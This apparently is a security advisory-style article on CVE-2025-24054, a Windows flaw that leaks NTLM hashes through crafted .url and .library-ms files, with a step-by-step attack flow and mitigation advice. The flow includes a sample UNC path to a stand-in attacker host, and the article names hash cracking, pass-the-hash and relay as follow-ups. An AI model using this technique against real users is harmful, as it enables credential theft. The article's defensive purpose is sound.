A newly disclosed Windows vulnerability, tracked as CVE-2025-24054, is currently being exploited in the wild, allowing attackers to harvest NTLM authentication hashes simply by tricking users into downloading malicious files. The flaw is particularly dangerous because it requires no user interaction beyond initiating a file download.

What Is CVE-2025-24054?

CVE-2025-24054 is a low-complexity vulnerability discovered in how Windows handles certain file download requests. Specifically, it affects applications that automatically fetch metadata or preview remote files upon download. Exploitation occurs when a remote server is able to coerce the client system into initiating NTLM authentication—a legacy Windows protocol prone to hash relay and cracking.

Attackers can exploit this by crafting a link to a file (e.g., .url, .library-ms, or .search-ms) hosted on a remote SMB or WebDAV share under their control. Once the file is downloaded, Windows may attempt an automatic NTLM authentication to the malicious server—leaking NTLMv2 hashes without the user knowing.

This is a textbook example of an NTLM credential-leak vulnerability, and it follows in the footsteps of past flaws like CVE-2023-23397, which was abused via Outlook calendar invites.

Real-World Exploitation Confirmed

Security researchers have already observed real-world exploitation of CVE-2025-24054 in the wild. Attackers are distributing malicious .url and .library-ms files through phishing emails and cloud storage links. Once the user initiates the download—especially via Microsoft Outlook or Microsoft Teams—the file triggers a silent outbound NTLM authentication to the attacker’s server.

These NTLMv2 hashes can then be:

• Cracked offline using tools like Hashcat or John the Ripper
• Used in pass-the-hash attacks to impersonate the victim
• Relayed to internal systems in real-time to escalate privileges

According to telemetry data from several threat intel firms, exploitation has been observed targeting government, finance, and manufacturing sectors—suggesting APT-level actors may already be leveraging this vulnerability in advanced campaigns.

Technical Mechanics of the Attack

Here’s a simplified flow of how the CVE-2025-24054 exploit works:

1. Attacker crafts a file (e.g., .url) pointing to a remote UNC path like \\malicious.example.com\file.url
2. Victim downloads or previews the file (via email, web link, or Teams message)
3. Windows attempts to resolve the UNC path
4. Windows automatically authenticates via NTLM (if allowed by policy)
5. The NTLM hash is sent to the attacker’s server
6. Attacker harvests or cracks the credentials

What makes this even more concerning is that the Windows Preview Pane and certain background services may trigger the authentication without any user interaction, depending on system configuration.

⚙️ Affected Systems

While Microsoft has not yet released a detailed advisory, initial indicators suggest the following are vulnerable:

• Windows 10, 11, and Server editions (especially default configurations)
• Systems with NTLM enabled and outbound SMB/WebDAV allowed
• Clients using Outlook, Teams, or browser-based collaboration tools
• Any endpoint that doesn’t restrict NTLM to specific trusted hosts

Mitigation & Recommendations

Until Microsoft issues an official patch, organizations are urged to adopt the following mitigations:

1. Block Outbound NTLM

Configure Group Policy to block outbound NTLM traffic except to approved servers:

pgsqlCopyEditComputer Configuration → Administrative Templates → System → Net Logon → Restrict NTLM: Outgoing NTLM traffic to remote servers

2. Disable NTLM Where Possible

Organizations should begin phasing out NTLM in favor of Kerberos or certificate-based authentication.

3. Filter or Block Suspicious File Types

Use endpoint protection to detect or block .url, .library-ms, and .search-ms files from untrusted sources.

4. User Awareness

Educate users about the risks of opening unexpected file types—even if they look benign.

5. Monitor for NTLM Auth Attempts

Use tools like Sysmon, Splunk, or Microsoft Defender for Endpoint to detect and log unexpected NTLM traffic to the internet.

When Will a Patch Be Available?

Microsoft has not yet confirmed a patch release date, but given the active exploitation, a security update is likely to be included in the upcoming Patch Tuesday cycle. Until then, mitigation is your best defense.

Final Thoughts

CVE-2025-24054 highlights yet another abuse of legacy authentication mechanisms like NTLM, which continue to plague Windows environments despite years of hardening efforts. Organizations must act quickly to contain exposure and prevent potential lateral movement and data theft through NTLM-based credential leaks.